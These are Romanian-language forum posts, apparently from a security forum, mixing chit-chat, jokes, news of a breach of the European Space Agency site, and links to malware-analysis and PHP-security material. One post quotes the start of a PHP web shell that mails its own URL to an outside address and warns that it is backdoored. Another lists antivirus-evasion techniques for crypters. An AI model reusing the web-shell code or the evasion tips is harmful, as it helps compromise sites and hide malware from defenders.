Nytro

Da, interesant, dar ideea de baza e stupida. Eu vreau sa gasesc SQL Injection in site-ul "x", cu ce ma incanta sa gasesc vulnerabil site-ul lui Vasile, folosind un dork?

Nu m-am uitat la emisiunea asta cacacioasa, dar am vazut cateva videoclipuri pe youtube, si asta chiar nu merita.

Open "D:\Fisier.txt" For Append As #1 Print #1, Text1.Text Close #1

Mi-a dat o poza cu ea, e draguta.

Sau poate sa fie fata. Nu e imposibil sa intre si fete aici.

Ce facea mai bine zis. Pe scurt: "transforma" un executabil detectabil intr-unul nedetectabil.

Security and Data Protection in a Google Data Center Nu e tocmai un tutorial, dar sunt lucruri interesante. Durata: 07:01 (cred ca gasiti voi 7 minute sa il vizionati) Youtube: http://www.youtube.com/watch?v=1SCZzgfdTBo&feature=player_embedded

Da ba, sa stiti ca plecati si sar strainii cu banii pe voi... Cum ajungeti acolo or sa va roage cu bani, pentru ca... ? Nu stiu, voi stiti. Ce credeti ca e peste hotare? Nu e nimic: nu tu familie, nu tu rude, nu tu prieteni, nu ii pasa nimanui de voi. In tara, daca ai o problema, ai la cine sa apelezi. Acolo esti pe cont propriu. Nu cred ca e tocmai paradisul... Credeti ca banii pica din cer? Voi ganditi?

Ban permanent. Infectie.

Malware Analysis: Rootkits (Video) Good video explaining rootkits using hxdef. Part 1 http://video.google.com/videoplay?docid=-1098574092821901542&q=source:015021726083819226340&hl=en Part 2 http://video.google.com/videoplay?docid=4452554918423531934&q=source:015021726083819226340&hl=en Part 3 http://video.google.com/videoplay?docid=-1835297762554988848&q=source:015021726083819226340&hl=en Sursa: http://www.hackhound.org/forum/index.php?/tutorials/article/244-malware-analysis-rootkits-video/

PHP Security This Tutorial covers Cross Site Scripting (XSS), Cross Site Forgery Requests (CSFR), SQL Injection, globals, and much more! Video (46:42): http://videos.code2design.com/video/play/PHP/11

Probabil e magicul j1c0. Cred ca ai venit aici numai la caterinca si nu cred ca vei rezista mult cat sunt eu prin preajma.

Windows 8: Advanced Task Manager-ul dezvaluit de Bianca Dinu | 21 aprilie 2011 Ultimul build al lui Windows 8, aflat in mainile dezvoltatorilor a condus la aparitia unei noi serii de screenshot-uri, care ne dezvaluie de data aceasta noul Advanced Task Manager al sistemului de operare. Cele doua screenshot-uri par sa evidentieze doua tipuri diferite de manager, unul optimizat pentru editia touch, iar celalalt standard. Prima imagine dezvaluie dashboard-ul aplicatiei, care le ofera utilizatorilor mult mai multe informatii despre procesele care ruleaza, serviciile si resursele sistemului. Procesele sunt listate acum intr-o interfata colorata, care ii va permite utilizatorului sa vada care dintre ele incarca cel mai mult sistemul. Al doilea screenshot reprezinta o alta versiune a Task Manager-ului, cu un puternic accent touch-friendly, care prezinta o lista de programe, utilizatori si itemi start-up. Ultimele screenshot-uri Windows 8 vin sa completeze o serie lunga de leak-uri, care au dezvaluit fanilor cateva feature-uri esentiale ale platformei. Si cum mai sunt inca multe de aflat, stay tuned pentru noi detalii Windows 8. Sursa: http://www.hit.ro/software/Windows-8-Advanced-Task-Manager-ul-dezvaluit

Fisierul din acea arhiva incepe asa: <?php # Web Shell by oRb $eu=1; while ($eu==1){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; mail ("yo_cristy_lov3_boy@yahoo.com","shell",$url); $eu++; } Adica (lasand stupiditatea acelui while) trimite un mai cu link-ul shell-ului astuia: yo_cristy_lov3_boy Adica nu mie ci unui cocalar. PS: Sunt total impotriva spamului.

Daca nu prea stii VB cum ai de gand sa modifici codul existent? Sunt diverse moduri de a face un crypter nedetectabil: modul in care sunt apelate API-urile necesare rularii executabilului in memorie, clasic sau dinamic. La dinamic poti sa cryptezi numele functiilor apelate, dar nu ajuta prea mult. Se poate adauga cod inutil pentru a evita anumite semnaturi pentru anumite zone de cod. Se poate pune o mica intarziere la executia programului pentru a scapa de sandboxu antivirusilor. Sunt multe lucruri de care trebuie tinut cont, si nu e deloc usor.

Bancuri Un roman a spart serverele Agentiei Spatiale Europene. In timp ce facea curat le-a lovit cu coada maturii. Pe o pagina de Facebook.

Reverse Code Engineering: An In-Depth Analysis of the Bagle Virus Author: Konstantin Rozinov 1. INTRODUCTION.......................................................................................................................3 2. BASIC X86 CONCEPTS................................................................................................................3 2.1. REGISTERS......................................................................................................................4 2.2. ASSEMBLY.......................................................................................................................5 2.3. RUNTIME DATA STRUCTURES..................................................................................................7 2.4. THE STACK......................................................................................................................9 3. VIRUS OVERVIEW...................................................................................................................12 3.1. VIRUS HISTORY...............................................................................................................12 3.2. VIRUS TYPES..................................................................................................................12 4. BAGLE VIRUS DISASSEMBLY.......................................................................................................13 4.1. OVERVIEW.....................................................................................................................13 4.2. ANALYSIS RESOURCES.......................................................................................................14 4.3. DISASSEMBLY APPROACH....................................................................................................16 4.4. ANALYSIS PROBLEMS AND SOLUTIONS.....................................................................................19 4.5. FUNCTIONAL FLOW...........................................................................................................22 5. CONCLUSIONS......................................................................................................................26 APPENDIX A: DETAILED DISASSEMBLY OF BAGLE VIRUS.............................................................................29 APPENDIX B: SOURCE CODE LISTING OF BAGLE VIRUS...............................................................................72 Download: http://www.binary-auditing.com/downloads/011%20-%20malware%20analysis/3%20Bagle%20A%20Virus/bagle_analysis_v.1.0.pdf

Go Null Yourself E-Zine #4 0x01 Introduction 0x02 Feedback + Edits 0x03 Lattice-Based Cryptography rattle 0x04 duper's Code Corner duper 0x05 The Tech Behind Credit Cards K141 0x06 Brief Notes on Kiosk Hacking storm 0x07 Linux Rootkit Dev Update duper 0x08 MapReduce, Part 2 elchupathingy 0x09 Cameras + DVRs Scan storm 0x0a 303-833-00xx Scan Shadytel, Inc 0x0b bit.ly Shenanigans Silks, elchupa 0x0c Programming Challenge storm 0x0d The Scoop on LIGATT 0x0e Et Cetera, Etc. teh crew Download: http://www.exploit-db.com/papers/17184/

European Space Agency – Full Disclosure realizat de Tinkode într-o zi cu semnifica?ie în domeniu ESA.INT, pagina oficial? a Agen?iei Spa?iale Europene, are probleme de securitate, probleme ce au fost eviden?iate de Tinkode, unul dintre cei mai mediatiza?i români care se ocup? de publicarea datelor confiden?iale pentru accesarea paginilor web ale unora dintre cele mai mari nume ale industriei IT ?i nu numai. Accesul ob?inut de acesta i-a permis s? extrag? conturi de editori, administratori, FTP ?amd. Nimic impresionant pân? aici, având în vedere activitatea sa din ultima perioad?. Întâmplarea face ca ieri, 17 aprilie, a fost ziua în care este s?rb?torit? reîntoarcerea lui Apollo 13 pe p?mânt dintr-o misiune. Dac? nu era suficient asta, acesta a publicat datele de autentificare ale exact 13 conturi de FTP ce ne duce cu gândul la o misiune ce a avut o ?int? clar?. Din nou, presa vuie?te ?i atât. Mai multe detalii pe blogul s?u. Sursa: http://www.worldit.info/noutati/european-space-agency-full-disclosure-realizat-de-tinkode-intr-o-zi-cu-semnificatie-in-domeniu/ Softpedia: http://news.softpedia.com/news/European-Space-Agency-Website-Hacked-195487.shtml

Contine resurse: - SQLite (asta nu sunt sigur daca e DLL sau EXE) - XMLite (extended module) - un DLL pentru sunete cred, BASS nu stiu cum In plus: "FileDescription", "iStealer" "FileVersion", "6, 1, 0, 0" Deci nu e 6.3. Asadar, nu sunt sigur ca e curat.

Hackers Wanted File name: Hackers Wanted [unreleased Director's Cut].avi File description: Hackers Wanted File size: 699.08 MB Download: http://www.megaupload.com/?d=ZF1MXDFT Megavideo: http://www.megavideo.com/?d=ZF1MXDFT Tocmai l-am vazut, e foarte interesant. Descrie bine termenii de hacker (blackhat, whitehat, grayhat) in sensuri la care probabil nu va ganditi. Sunt multe lucruri interesante, vi-l recomand. Singura problema e ca nu are subtitrare, dar ar trebui sa va descurcati cu engleza.

Sper ca ai o explicatie buna. E un server de Radmin v2.1 in arhiva SFX.

Funtioneaza doar pe messenger 8.0. Doar multi-messenger merge pe versiunile mai noi. Deci nu cred ca e prea util.

Sa fie asta cel mai interesant tutorial pe care il puteti gasi aici? Sau preferati sa nu va ridicati deloc nivelul cunostintelor cu ceva, sa zicem, mai "complex"?

Trebuia sa te astepti la astfel de replici cand ai postat.